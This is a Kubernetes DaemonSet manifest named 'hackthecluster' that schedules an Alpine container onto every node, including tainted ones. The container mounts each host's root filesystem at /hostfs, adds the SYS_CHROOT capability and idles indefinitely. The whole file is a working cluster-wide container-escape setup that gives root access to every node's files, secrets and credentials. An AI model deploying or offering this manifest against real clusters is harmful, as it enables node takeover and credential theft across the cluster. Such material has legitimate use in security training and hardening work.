apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hackthecluster
spec:
  selector:
    matchLabels:
      app: hackthecluster
  template:
    metadata:
      labels:
        app: hackthecluster
    spec:
      volumes:
      - name: slash
        hostPath:
          path: /
      tolerations:
      - effect: NoSchedule
        operator: Exists
      containers:
      - name: alpine
        image: alpine
        volumeMounts:
        - name: slash
          mountPath: /hostfs
        command:
        - sleep
        - infinity
        securityContext:
          #privileged: true
          capabilities:
            add:
            - SYS_CHROOT